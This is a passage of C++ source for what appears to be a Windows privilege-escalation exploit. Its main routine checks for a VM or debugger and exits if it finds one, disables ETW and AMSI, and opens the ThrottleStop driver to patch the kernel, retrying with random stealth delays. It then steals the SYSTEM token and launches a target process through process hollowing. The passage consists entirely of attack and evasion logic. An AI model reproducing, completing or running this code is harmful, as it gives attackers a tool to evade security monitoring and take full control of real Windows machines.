config->RandomSleepMin = 50;
config->RandomSleepMax = 200;
}
void RandomSleepConfigurable(const EXPLOIT_CONFIG* config) {
if (!config->UseStealthMode) return;
std::uniform_int_distribution<> dis(config->RandomSleepMin, config->RandomSleepMax);
Sleep(dis(gen));
}
int main(int argc, char* argv[]) {
EXPLOIT_CONFIG config;
LoadDefaultConfig(&config);
if (argc > 1) {
wchar_t configFilePath[MAX_PATH];
mbstowcs_s(NULL, configFilePath, MAX_PATH, argv[1], _TRUNCATE);
}
g_bStealthMode = config.UseStealthMode;
if (IsRunningInVMAdvanced() || IsDebuggerPresentAdvanced()) {
return 0;
}
g_dwWindowsVersion = GetWindowsVersion();
if (config.DisableETW) {
DisableETWWithEncryptedAPIs();
}
if (config.DisableAMSI) {
DisableAMSIWithEncryptedAPIs();
}
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return 1;
}
bool success = false;
for (ULONG version = 1; version <= 5 && !success; version++) {
for (DWORD retry = 0; retry < config.MaxRetries && !success; retry++) {
RandomSleepConfigurable(&config);
if (PatchKernelForPrivilegeEscalationSafe(hDevice, version)) {
success = true;
}
}
}
CloseHandle(hDevice);
if (!success) {
return 1;
}
if (!StealSystemToken()) {
return 1;
}
if (!CreateProcessWithHollowing(config.TargetProcess, config.CommandLine)) {
return 1;
}
return 0;
}